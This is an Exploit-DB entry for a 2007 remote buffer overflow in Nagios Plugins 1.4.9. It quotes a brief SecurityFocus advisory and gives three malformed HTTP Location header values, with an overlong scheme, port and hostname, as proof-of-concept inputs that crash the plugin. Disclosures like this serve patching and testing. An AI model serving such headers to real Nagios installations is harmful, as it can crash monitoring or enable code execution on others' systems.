Nagios Plugins 1.4.2/1.4.9 - Location Header Remote Buffer Overflow

EDB-ID:

30646


Type:

dos


Platform:

Linux

Date:

2007-07-16


source: https://www.securityfocus.com/bid/25952/info

Nagios Plugins are prone to a remote buffer-overflow vulnerability because the software fails to properly bounds-check user-supplied data before copying it to an insufficiently sized buffer.

Exploiting this issue allows attackers to execute arbitrary machine code in the context of users running the affected software.

This issue affects Nagios Plugins 1.4.9; other versions may also be vulnerable. 

Location: htttttttttttttttttttttttttttttttttttttttttttp://example.com/

Location: http://example.com:1234567890123456789012345678901234567890/

Location:
http://tooooooooooooooooooooooooooooooooooooooooooooooooooo.loooooooooooooo
oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooong.looooooooo
ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooong.loooo
oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooong.
loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
oong.looooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
ooooooong.loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
oooooooooooong.host-name.example.com/